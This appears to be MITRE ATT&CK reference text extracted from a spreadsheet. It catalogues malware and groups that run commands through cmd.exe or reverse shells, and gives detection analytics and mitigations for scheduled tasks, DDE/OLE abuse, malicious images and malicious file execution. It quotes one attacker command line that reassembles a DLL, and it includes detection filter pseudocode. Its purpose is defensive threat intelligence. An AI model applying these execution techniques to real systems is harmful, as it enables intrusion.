[menuPass](https://attack.mitre.org/groups/G0045) executes commands using a command-line interface and reverse shell. The group has used a modified version of pentesting script wmiexec.vbs to execute commands.(Citation: PWC Cloud Hopper April 2017)(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Github AD-Pentest-Script)(Citation: FireEye APT10 Sept 2018) [menuPass](https://attack.mitre.org/groups/G0045) has used malicious macros embedded inside Office documents to execute files.(Citation: Accenture Hogfish April 2018)(Citation: FireEye APT10 Sept 2018)
4H RAT
[4H RAT](https://attack.mitre.org/software/S0065) has the capability to create a remote shell.(Citation: CrowdStrike Putter Panda)
ABK
[ABK](https://attack.mitre.org/software/S0469) has the ability to use [cmd](https://attack.mitre.org/software/S0106) to run a Portable Executable (PE) on the compromised host.(Citation: Trend Micro Tick November 2019)
ADVSTORESHELL
[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can create a remote shell and run a given command.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)
Action RAT
[Action RAT](https://attack.mitre.org/software/S1028) can use `cmd.exe` to execute commands on an infected host.(Citation: MalwareBytes SideCopy Dec 2021)
Anchor
[Anchor](https://attack.mitre.org/software/S0504) has used cmd.exe to run its self deletion routine.(Citation: Cyberreason Anchor December 2019)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) spawns a CMD process to execute commands. (Citation: Cybereason Astaroth Feb 2019)
AuTo Stealer
 [AuTo Stealer](https://attack.mitre.org/software/S1029) can use `cmd.exe` to execute a created batch file.(Citation: MalwareBytes SideCopy Dec 2021)
AuditCred
[AuditCred](https://attack.mitre.org/software/S0347) can open a reverse shell on the system to execute commands.(Citation: TrendMicro Lazarus Nov 2018)
BACKSPACE
Adversaries can direct [BACKSPACE](https://attack.mitre.org/software/S0031) to execute from the command line on infected hosts, or have [BACKSPACE](https://attack.mitre.org/software/S0031) create a reverse shell.(Citation: FireEye APT30)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can use `cmd.exe` to execute commands on a compromised host.(Citation: Gigamon BADHATCH Jul 2019)(Citation: BitDefender BADHATCH Mar 2021) 
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) is capable of executing commands via cmd.exe.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)
BBK
[BBK](https://attack.mitre.org/software/S0470) has the ability to use [cmd](https://attack.mitre.org/software/S0106) to run a Portable Executable (PE) on the compromised host.(Citation: Trend Micro Tick November 2019)
BISCUIT
[BISCUIT](https://attack.mitre.org/software/S0017) has a command to launch a command shell on the system.(Citation: Mandiant APT1 Appendix)
BLACKCOFFEE
[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to create a reverse shell.(Citation: FireEye APT17)
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) has executed commands via cmd.exe.(Citation: US-CERT BLINDINGCAN Aug 2020)
BONDUPDATER
[BONDUPDATER](https://attack.mitre.org/software/S0360) can read batch commands in a file sent from its C2 server and execute them with cmd.exe.(Citation: Palo Alto OilRig Sep 2018)
Babuk
[Babuk](https://attack.mitre.org/software/S0638) has the ability to use the command line to control execution on compromised hosts.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)
BabyShark
[BabyShark](https://attack.mitre.org/software/S0414) has used cmd.exe to execute commands.(Citation: Unit42 BabyShark Feb 2019)	
BackConfig
[BackConfig](https://attack.mitre.org/software/S0475) can download and run batch files to execute commands on a compromised host.(Citation: Unit 42 BackConfig May 2020)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) is capable of spawning a Windows command shell.(Citation: EFF Manul Aug 2016)(Citation: CheckPoint Bandook Nov 2020)
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) uses the command-line interface to execute arbitrary commands.(Citation: McAfee Bankshot)(Citation: US-CERT Bankshot Dec 2017)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can launch cmd.exe to perform reconnaissance commands.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has launched cmd.exe and used the ShellExecuteW() API function to execute commands on the system.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020)
Black Basta
[Black Basta](https://attack.mitre.org/software/S1070) can use `cmd.exe` to enable shadow copy deletion.(Citation: Deep Instinct Black Basta August 2022)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) can execute commands on a compromised network with the use of `cmd.exe`.(Citation: Microsoft BlackCat Jun 2022)
BlackMould
[BlackMould](https://attack.mitre.org/software/S0564) can run cmd.exe with parameters.(Citation: Microsoft GALLIUM December 2019)
BoxCaon
[BoxCaon](https://attack.mitre.org/software/S0651) can execute arbitrary commands and utilize the "ComSpec" environment variable.(Citation: Checkpoint IndigoZebra July 2021)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can use cmd.exe for execution.(Citation: Palo Alto Brute Ratel July 2022)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can use `cmd.exe` to drop and run files.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)
CALENDAR
[CALENDAR](https://attack.mitre.org/software/S0025) has a command to run cmd.exe to execute commands.(Citation: Mandiant APT1 Appendix)
CARROTBAT
[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to execute command line arguments on a compromised host.(Citation: Unit 42 CARROTBAT January 2020)
Carbanak
[Carbanak](https://attack.mitre.org/software/S0030) has a command to create a reverse shell.(Citation: FireEye CARBANAK June 2017)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) can execute commands.(Citation: PaloAlto CardinalRat Apr 2017)
Caterpillar WebShell
[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can run commands on the compromised asset with CMD functions.(Citation: ClearSky Lebanese Cedar Jan 2021)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has used [cmd](https://attack.mitre.org/software/S0106) to execute tasks on the system.(Citation: Cybereason Chaes Nov 2020) 
CharmPower
The C# implementation of  the [CharmPower](https://attack.mitre.org/software/S0674) command execution module can use &lt;code&gt;cmd&lt;/code&gt;.(Citation: Check Point APT35 CharmPower January 2022)
China Chopper
[China Chopper](https://attack.mitre.org/software/S0020)'s server component is capable of opening a command terminal.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can use cmd.exe for command execution.(Citation: Trend Micro DRBControl February 2020)
Clop
[Clop](https://attack.mitre.org/software/S0611) can use cmd.exe to help execute commands on the system.(Citation: Cybereason Clop Dec 2020) 
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) uses a command-line interface to interact with systems.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)(Citation: Trend Micro Black Basta October 2022)
Cobian RAT
[Cobian RAT](https://attack.mitre.org/software/S0338) can launch a remote command shell interface for executing commands.(Citation: Zscaler Cobian Aug 2017)
CoinTicker
[CoinTicker](https://attack.mitre.org/software/S0369) executes a bash script to establish a reverse shell.(Citation: CoinTicker 2019)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) has used &lt;code&gt;cmd.exe&lt;/code&gt; to execute commands.(Citation: ESET ComRAT May 2020)
Comnie
[Comnie](https://attack.mitre.org/software/S0244) executes BAT scripts.(Citation: Palo Alto Comnie)
Conti
[Conti](https://attack.mitre.org/software/S0575) can utilize command line options to allow an attacker control over how it scans and encrypts files.(Citation: CarbonBlack Conti July 2020)(Citation: DFIR Conti Bazar Nov 2021)
CozyCar
A module in [CozyCar](https://attack.mitre.org/software/S0046) allows arbitrary commands to be executed by invoking &lt;code&gt;C:\Windows\System32\cmd.exe&lt;/code&gt;.(Citation: F-Secure CozyDuke)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) has the ability to execute commands with the COMSPEC environment variable.(Citation: Kaspersky Transparent Tribe August 2020)
Cuba
[Cuba](https://attack.mitre.org/software/S0625) has used &lt;code&gt;cmd.exe /c&lt;/code&gt; and batch files for execution.(Citation: McAfee Cuba April 2021) 
DEADEYE
[DEADEYE](https://attack.mitre.org/software/S1052) can run `cmd /c copy /y /b C:\Users\public\syslog_6-*.dat C:\Users\public\syslog.dll` to combine separated sections of code into a single DLL prior to execution.(Citation: Mandiant APT41)
DanBot
[DanBot](https://attack.mitre.org/software/S1014) has the ability to execute arbitrary commands via `cmd.exe`.(Citation: SecureWorks August 2019)(Citation: ClearSky Siamesekitten August 2021)
DarkComet
[DarkComet](https://attack.mitre.org/software/S0334) can launch a remote shell to execute commands on the victim’s machine.(Citation: Malwarebytes DarkComet March 2018)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) can use `cmd.exe` to add registry keys for persistence.(Citation: Secureworks DarkTortilla Aug 2022)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) can use `cmd.exe` to execute commands.(Citation: Prevailion DarkWatchman 2021)
Daserf
[Daserf](https://attack.mitre.org/software/S0187) can execute shell commands.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)
DealersChoice
[DealersChoice](https://attack.mitre.org/software/S0243) makes modifications to open-source scripts from GitHub and executes them on the victim’s machine.(Citation: Sofacy DealersChoice)
Denis
[Denis](https://attack.mitre.org/software/S0354) can launch a remote shell to execute arbitrary commands on the victim’s machine.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)
Dipsind
[Dipsind](https://attack.mitre.org/software/S0200) can spawn remote shells.(Citation: Microsoft PLATINUM April 2016)
DnsSystem
[DnsSystem](https://attack.mitre.org/software/S1021) can use `cmd.exe` for execution.(Citation: Zscaler Lyceum DnsSystem June 2022)
DownPaper
[DownPaper](https://attack.mitre.org/software/S0186) uses the command line.(Citation: ClearSky Charming Kitten Dec 2017)
DropBook
[DropBook](https://attack.mitre.org/software/S0547) can execute arbitrary shell commands on the victims' machines.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020) 
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567) has used &lt;code&gt;cmd.exe&lt;/code&gt; to add a persistent service.(Citation: CyberBit Dtrack)
ECCENTRICBANDWAGON
[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can use [cmd](https://attack.mitre.org/software/S0106) to execute commands on a victim’s machine.(Citation: CISA EB Aug 2020)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) has used batch files for execution and can launch Internet Explorer from cmd.exe.(Citation: JoeSecurity Egregor 2020)(Citation: Cybereason Egregor Nov 2020) 
Emissary
[Emissary](https://attack.mitre.org/software/S0082) has the capability to create a remote shell and execute specified commands.(Citation: Lotus Blossom Dec 2015)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has used cmd.exe to run a PowerShell script. (Citation: Picus Emotet Dec 2018)
Empire
[Empire](https://attack.mitre.org/software/S0363) has modules for executing scripts.(Citation: Github PowerShell Empire)
EnvyScout
[EnvyScout](https://attack.mitre.org/software/S0634) can use cmd.exe to execute malicious files on compromised hosts.(Citation: MSTIC Nobelium Toolset May 2021)
EvilBunny
[EvilBunny](https://attack.mitre.org/software/S0396) has an integrated scripting engine to download and execute Lua scripts.(Citation: Cyphort EvilBunny Dec 2014)
Exaramel for Windows
[Exaramel for Windows](https://attack.mitre.org/software/S0343) has a command to launch a remote shell and executes commands on the victim’s machine.(Citation: ESET TeleBots Oct 2018)
FELIXROOT
[FELIXROOT](https://attack.mitre.org/software/S0267) executes batch scripts on the victim’s machine, and can launch a reverse shell for command execution.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)
Felismus
[Felismus](https://attack.mitre.org/software/S0171) uses command line for execution.(Citation: Forcepoint Felismus Mar 2017)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) can use `cmd.exe` to execute commands received from C2.(Citation: NTT Security Flagpro new December 2021)
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) has used `cmd` to execute commands on a compromised host.(Citation: Korean FSI TA505 2020)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can use `cmd.exe` for execution on remote hosts.(Citation: Bitdefender FunnyDream Campaign November 2020)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can use a batch script to delete itself.(Citation: ESET Gelsemium June 2021)
Gold Dragon
[Gold Dragon](https://attack.mitre.org/software/S0249) uses cmd.exe to execute commands for discovery.(Citation: McAfee Gold Dragon)
GoldMax
[GoldMax](https://attack.mitre.org/software/S0588) can spawn a command shell, and execute native commands.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)
GoldenSpy
[GoldenSpy](https://attack.mitre.org/software/S0493) can execute remote commands via the command-line interface.(Citation: Trustwave GoldenSpy June 2020)	
Goopy
[Goopy](https://attack.mitre.org/software/S0477) has the ability to use cmd.exe to execute commands passed from an Outlook C2 channel.(Citation: Cybereason Cobalt Kitty 2017)	
GravityRAT
[GravityRAT](https://attack.mitre.org/software/S0237) executes commands remotely on the infected host.(Citation: Talos GravityRAT)
GreyEnergy
[GreyEnergy](https://attack.mitre.org/software/S0342) uses cmd.exe to execute itself in-memory.(Citation: ESET GreyEnergy Oct 2018)
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632) can use the Windows Command Shell to execute commands, including its own removal.(Citation: Group IB GrimAgent July 2021)
H1N1
[H1N1](https://attack.mitre.or</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that could be taken to create/modify tasks. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.
File Modification
On Windows, monitor Windows Task Scheduler stores in `%systemroot%\System32\Tasks` for change entries related to scheduled tasks, especially those that do not correlate with known software, patch cycles, etc. On Linux and macOS, all [at](https://attack.mitre.org/software/S0110) jobs are stored in &lt;code&gt;/var/spool/cron/atjobs/&lt;/code&gt;.(Citation: rowland linux at 2019)
Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. When AT.exe is used to remotely schedule tasks, Windows uses named pipes over SMB to communicate with the API on the remote machine. After authentication over SMB, the Named Pipe &lt;code&gt;ATSVC&lt;/code&gt; is opened, over which the JobAdd function is called. On the remote host, the job files are created by the Task Scheduler and follow the convention &lt;code&gt;C:\Windows\System32\AT&lt;job\_id&gt;&lt;/code&gt;.
This pipe activity could be discovered with a network decoder, such as that in wireshark, that can inspect SMB traffic to identify the use of pipes. It could also be detected by looking for raw packet capture streams or from a custom sensor on the host that hooks the appropriate API functions. If no network or API level of visibility is possible, this traffic may inferred by looking at SMB connections over 445/tcp followed by the creation of files matching the pattern &lt;code&gt;C:\Windows\System32\AT\&lt;job_id\&gt;&lt;/code&gt;.
To detect AT via network traffic, a sensor is needed that has the ability to extract and decode PCAP information. Specifically, it needs to properly decode SMB and the functions that are implemented over it via NamedPipes. If a sensor meets these criteria, then the PCAP data needs to search for instances of the command &lt;code&gt;JobAdd&lt;/code&gt; over the pipe &lt;code&gt;ATSVC&lt;/code&gt;, which is all implemented over Windows SMB 445/tcp.
&lt;h4&gt; Analytic 1 - Remotely Scheduled Tasks via AT &lt;/h4&gt;
&lt;code&gt;flows = search Flow:Message
at_proto = filter flows where (dest_port == 445 and proto_info.pipe == "ATSVC")
at_create = filter flows where (proto_info.function == "JobAdd")&lt;/code&gt;
Process Creation
Monitor for newly constructed processes with command-lines that create/modify or are executed from tasks. For example, on Windows tasks may spawn from `svchost.exe` or the Windows Task Scheduler `taskeng.exe` for older OS versions. (Citation: Twitter Leoloobeek Scheduled Task) Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Instances of the process at.exe running imply the querying or creation of tasks. Although the command_line is not essential for the analytic to run, it is critical when identifying the command that was scheduled.
&lt;h4&gt;Analytic &lt;/h4&gt;
&lt;code&gt;at = filter process where (exe == "at.exe")&lt;/code&gt;
Scheduled Job Creation
Monitor for newly constructed scheduled jobs. If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. On Windows, enable the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service where several events will then be logged on scheduled task activity, including:(Citation: TechNet Forum Scheduled Task Operational Setting)
* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered
* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created
* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled
* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Audit
Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges. (Citation: Powersploit) Windows operating system also creates a registry key specifically associated with the creation of a scheduled task on the destination host at: Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. (Citation: Secureworks - AT.exe Scheduled Task) In Linux and macOS environments, scheduled tasks using &lt;code&gt;[at](https://attack.mitre.org/software/S0110)&lt;/code&gt; can be audited locally, or through centrally collected logging, using syslog, or auditd events from the host. (Citation: Kifarunix - Task Scheduling in Linux)
Operating System Configuration
Configure settings for scheduled tasks to force tasks to run under the context of the authenticated account instead of allowing them to run as SYSTEM. The associated Registry key is located at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl&lt;/code&gt;. The setting can be configured through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; Security Options: Domain Controller: Allow server operators to schedule tasks, set to disabled. (Citation: TechNet Server Operator Scheduled Task) 
Privileged Account Management
Configure the Increase Scheduling Priority option to only allow the Administrators group the rights to schedule a priority process. This can be configured through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Increase scheduling priority. (Citation: TechNet Scheduling Priority)
User Account Management
Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks on remote systems. In Linux environments, users account-level access to &lt;code&gt;[at](https://attack.mitre.org/software/S0110)&lt;/code&gt; can be managed using &lt;code&gt;at.allow&lt;/code&gt; and &lt;code&gt;at.deny&lt;/code&gt; files. Users listed in the at.allow are enabled to schedule actions using at, whereas users listed in at.deny file disabled from the utility.
APT18
[APT18](https://attack.mitre.org/groups/G0026) actors used the native [at](https://attack.mitre.org/software/S0110) Windows task scheduler tool to use scheduled tasks for execution on a victim network.(Citation: Dell Lateral Movement)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used [at](https://attack.mitre.org/software/S0110) to register a scheduled task to execute malware during lateral movement.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors use [at](https://attack.mitre.org/software/S0110) to schedule tasks to run self-extracting RAR archives, which install [HTTPBrowser](https://attack.mitre.org/software/S0070) or [PlugX](https://attack.mitre.org/software/S0013) on other victims on a network.(Citation: Dell TG-3390)
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can set a scheduled task on the target system to execute commands remotely using [at](https://attack.mitre.org/software/S0110).(Citation: CME Github September 2018)
MURKYTOP
[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to schedule remote AT jobs.(Citation: FireEye Periscope March 2018)
at
[at](https://attack.mitre.org/software/S0110) can be used to schedule a task on a system to be executed at a specific date or time.(Citation: TechNet At)(Citation: Linux at)
</t>
  </si>
  <si>
    <t xml:space="preserve">Module Load
Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe).
Process Creation
Monitor for newly executed processes that may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands.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
&lt;h4&gt;Analytic 1 - Unusual Child Process spawned using DDE exploit&lt;/h4&gt;
&lt;code&gt; target_processes = filter processes where (
     (parent_image="*excel.exe" OR parent_image="*word.exe" OR parent_image="*outlook.exe")
     AND image="*.exe") &lt;/code&gt;
Script Execution
Monitor for any attempts to enable scripts running on a system would be considered suspicious. OLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/
Application Isolation and Sandboxing
Ensure Protected View is enabled.(Citation: Microsoft Protected View)
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent DDE attacks and spawning of child processes from Office programs.(Citation: Microsoft ASR Nov 2017)(Citation: Enigma Reviving DDE Jan 2018)
Disable or Remove Feature or Program
Registry keys specific to Microsoft Office feature control security can be set to disable automatic DDE/OLE execution. (Citation: Microsoft DDE Advisory Nov 2017)(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: GitHub Disable DDEAUTO Oct 2017) Microsoft also created, and enabled by default, Registry keys to completely disable DDE execution in Word and Excel.(Citation: Microsoft ADV170021 Dec 2017)
Software Configuration
Consider disabling embedded files in Office programs, such as OneNote, that do not work with Protected View.(Citation: Enigma Reviving DDE Jan 2018)(Citation: GitHub Disable DDEAUTO Oct 2017)
Operation Sharpshooter
During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), threat actors sent malicious Word OLE documents to victims.(Citation: McAfee Sharpshooter December 2018)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has delivered [JHUHUGIT](https://attack.mitre.org/software/S0044) and [Koadic](https://attack.mitre.org/software/S0250) by executing PowerShell commands through DDE in Word documents.(Citation: McAfee APT28 DDE1 Nov 2017)(Citation: McAfee APT28 DDE2 Nov 2017)(Citation: Palo Alto Sofacy 06-2018)
APT37
[APT37](https://attack.mitre.org/groups/G0067) has used Windows DDE for execution of commands and a malicious VBS.(Citation: Securelist ScarCruft Jun 2016)
BITTER
[BITTER](https://attack.mitre.org/groups/G1002) has executed OLE objects using Microsoft Equation Editor to download and run malicious payloads.(Citation: Cisco Talos Bitter Bangladesh May 2022) 
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has sent malicious Word OLE compound documents to victims.(Citation: Talos Cobalt Group July 2018)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) spear phishing campaigns have included malicious Word documents with DDE execution.(Citation: CyberScoop FIN7 Oct 2017)
Gallmaker
[Gallmaker](https://attack.mitre.org/groups/G0084) attempted to exploit Microsoft’s DDE protocol in order to gain access to victim machines and for execution.(Citation: Symantec Gallmaker Oct 2018)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has utilized OLE as a method to insert malicious content inside various phishing documents. (Citation: Accenture MUDCARP March 2019)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can execute PowerShell scripts via DDE.(Citation: Securelist MuddyWater Oct 2018)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) leveraged the DDE protocol to deliver their malware.(Citation: TrendMicro Patchwork Dec 2017)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has used the ActiveXObject utility to create OLE objects to obtain execution through Internet Explorer.(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has leveraged malicious Word documents that abused DDE.(Citation: Proofpoint TA505 June 2018)
GravityRAT
[GravityRAT](https://attack.mitre.org/software/S0237) has been delivered via Word documents using DDE for execution.(Citation: Talos GravityRAT)
HAWKBALL
[HAWKBALL](https://attack.mitre.org/software/S0391) has used an OLE object that uses Equation Editor to drop the embedded shellcode.(Citation: FireEye HAWKBALL Jun 2019)
KeyBoy
[KeyBoy](https://attack.mitre.org/software/S0387) uses the Dynamic Data Exchange (DDE) protocol to download remote payloads.(Citation: PWC KeyBoys Feb 2017)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) can use DDE to execute additional payloads on compromised hosts.(Citation: FireEye MuddyWater Mar 2018)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) was delivered with documents using DDE to execute malicious code.(Citation: Talos PoetRAT April 2020)
RTM
[RTM](https://attack.mitre.org/software/S0148) can search for specific strings within browser tabs using a Dynamic Data Exchange mechanism.(Citation: ESET RTM Feb 2017)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) has been delivered using OLE objects in malicious documents.(Citation: Eset Ramsay May 2020)	
Valak
[Valak](https://attack.mitre.org/software/S0476) can execute tasks via OLE.(Citation: SentinelOne Valak June 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Process Access
Monitor for processes making abnormal calls to higher privileged processes, such as a user application connecting to a VPN service.(Citation: versprite xpc vpn)
Application Developer Guidance
Enable the Hardened Runtime capability when developing applications. Do not include the &lt;code&gt;com.apple.security.get-task-allow&lt;/code&gt; entitlement with the value set to any variation of true. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may rely on a user running a malicious image to facilitate execution.
Command Execution
Monitor executed commands and arguments that may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.
Container Creation
Track the deployment of new containers, especially from newly built images.
Container Start
Monitor the behavior of containers within the environment to detect anomalous behavior or malicious activity after users deploy from malicious images.
Image Creation
Monitor the local image registry to make sure malicious images are not added.
Instance Creation
Monitor for newly constructed instances that may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.
Instance Start
Monitor for the activation or invocation of an instance (ex: instance.start within GCP Audit Logs)
Audit
Audit images deployed within the environment to ensure they do not contain any malicious components.
Code Signing
Utilize a trust model such as Docker Content Trust with digital signatures to ensure runtime verification of the integrity and publisher of specific image tags.(Citation: Content trust in Docker)(Citation: Content trust in Azure Container Registry)
Network Intrusion Prevention
Network prevention intrusion systems and systems designed to scan and remove malicious downloads can be used to block activity.
User Training
Train users to be aware of the existence of malicious images and how to avoid deploying instances and containers from them.
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has relied on users to download and execute malicious Docker images.(Citation: Lacework TeamTNT May 2021)
</t>
  </si>
  <si>
    <t>File Creation
Monitor for newly constructed files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).
While batch files are not inherently malicious, it is uncommon to see them created after OS installation, especially in the Windows directory. This analytic looks for the suspicious activity of a batch file being created within the C:\Windows\System32 directory tree. There will be only occasional false positives due to administrator actions.
For Windows, Sysmon Event ID 11 (File create) can be used to track file creation events. This event also provides the Process ID of the process that created the file, which can be correlated with process creation events (e.g., Sysmon Event ID 1) to determine if the file was downloaded from an external network.
For MacOS, utilities that work in concert with Apple’s Endpoint Security Framework such as File Monitor can be used to track file creation events.
&lt;h4&gt; Analytic 1 : Batch File Write to System32 &lt;/h4&gt;
&lt;code&gt; batch_files = filter files where (
  extension =".bat" AND file_path = "C:\Windows\system32*" ) &lt;/code&gt;
Process Creation
Monitor for newly constructed processes and/or command-lines for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to Deobfuscate/Decode Files or Information in payloads.
Behavior Prevention on Endpoint
On Windows 10, various Attack Surface Reduction (ASR) rules can be enabled to prevent the execution of potentially malicious executable files (such as those that have been downloaded and executed by Office applications/scripting interpreters/email clients or that do not meet specific prevalence, age, or trusted list criteria). Note: cloud-delivered protection must be enabled for certain rules. (Citation: win10_asr)
Execution Prevention
Application control may be able to prevent the running of executables masquerading as other files.
User Training
Use user training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious events.
2015 Ukraine Electric Power Attack
During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) leveraged Microsoft Office attachments which contained malicious macros that were automatically executed once the user permitted them. (Citation: Ukraine15 - EISAC - 201603)
C0011
During [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) relied on a student target to open a malicious document delivered via email.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors relied on users to enable macros within a malicious Microsoft Word document.(Citation: DFIR Conti Bazar Nov 2021)
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors relied on a victim to enable macros within a malicious Microsoft Word document likely sent via email.(Citation: Talos Frankenstein June 2019)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) lured victims into executing malicious documents that contained "dream job" descriptions from defense, aerospace, and other sectors.(Citation: ClearSky Lazarus Aug 2020)(Citation: McAfee Lazarus Jul 2020)
Operation Dust Storm
During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors relied on potential victims to open a malicious Microsoft Word document sent via email.(Citation: Cylance Dust Storm)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), threat actors relied on a victim to enable macros within a malicious Word document.(Citation: McAfee Honeybee)
Operation Sharpshooter
